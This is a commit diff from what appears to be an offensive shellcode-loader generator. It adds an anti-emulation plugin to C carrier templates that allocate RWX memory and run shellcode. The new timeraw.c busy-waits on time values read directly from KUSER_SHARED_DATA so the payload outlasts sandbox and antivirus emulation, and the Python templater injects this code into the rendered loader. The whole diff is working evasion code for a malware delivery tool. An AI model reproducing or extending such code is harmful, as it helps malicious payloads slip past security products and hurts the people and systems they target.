feature: antiemulation in templates

data/source/carrier/alloc_rw_rwx/template.c

@@ -15,6 +15,9 @@ char *supermega_payload;
    * will set it to RWX (safe to run shellcodes, opsec-unsafe)
 */
 
+{{plugin_antiemulation}}
+
+
 int main()
 {
 	// Execution Guardrail: Env Check
@@ -29,6 +32,9 @@ int main()
 		return 6;
 	}
 
+	// Depends on plugin_antiemulation
+	antiemulation();
+
 	// Decoy
 	//WinExec("C:\\windows\\system32\\notepad.exe", 1);
 

data/source/carrier/alloc_rw_rx/template.c

@@ -8,6 +8,9 @@ char *supermega_payload;
 #define p_RX  0x20
 #define p_RWX 0x40
 
+
+{{plugin_antiemulation}}
+
 /* iat_reuse_rx
 
    Standard IAT reuse shellcode
@@ -29,6 +32,9 @@ int main()
 		return 6;
 	}
 
+	// Depends on plugin_antiemulation
+	antiemulation();
+
 	// Decoy
 	//WinExec("C:\\windows\\system32\\notepad.exe", 1);
 

data/source/carrier/antiemulation/none.c

@@ -0,0 +1,4 @@
+
+void antiemulation() {
+    // None
+}

data/source/carrier/antiemulation/timeraw.c

@@ -0,0 +1,20 @@
+
+int get_time_raw() {
+    ULONG* PUserSharedData_TickCountMultiplier = (PULONG)0x7ffe0004;
+    LONG* PUserSharedData_High1Time = (PLONG)0x7ffe0324;
+    ULONG* PUserSharedData_LowPart = (PULONG)0x7ffe0320;
+    DWORD kernelTime = (*PUserSharedData_TickCountMultiplier) * (*PUserSharedData_High1Time << 8) +
+        ((*PUserSharedData_LowPart) * (unsigned __int64)(*PUserSharedData_TickCountMultiplier) >> 24);
+    return kernelTime;
+}
+
+
+int sleep_ms(DWORD sleeptime) {
+    DWORD start = get_time_raw();
+    while (get_time_raw() - start < sleeptime) {}
+}
+
+
+void antiemulation() {
+    sleep_ms(3000);
+}

model/defs.py

@@ -13,7 +13,9 @@ PATH_EXES_MORE = "data/binary/exes_more/"
 PATH_SHELLCODES = "data/binary/shellcodes/"
 PATH_CARRIER = "data/source/carrier/"
 PATH_PAYLOAD = "data/source/payload/"
+
 PATH_DECODER = "data/source/carrier/decoder/"
+PATH_ANTIEMULATION = "data/source/carrier/antiemulation/"
 
 PATH_WEB_PROJECT = "projects/"
 

phases/templater.py

@@ -37,15 +37,22 @@ def create_c_from_template(settings: Settings, payload_len: int):
             'XOR_KEY2': ascii_to_hex_bytes(config.xor_key2),
         })
 
+    # Anti-Emulation
+    filepath_antiemulation = PATH_ANTIEMULATION + "{}.c".format("timeraw")
+    with open(filepath_antiemulation, "r", encoding='utf-8') as file:
+        plugin_antiemualation = file.read()
+
     # Choose correct template
     dirpath = PATH_CARRIER + settings.carrier_name + "/template.c"
     with open(dirpath, 'r', encoding='utf-8') as file:
         template_content = file.read()
         observer.add_text_file("main_c_template", template_content)
 
+    # Render main template
     template = Template(template_content)
     rendered_template = template.render({
         'plugin_decoder': plugin_decoder,
+        'plugin_antiemulation': plugin_antiemualation,
         'PAYLOAD_LEN': payload_len,
     })
     with open(settings.main_c_path, "w", encoding='utf-8') as file: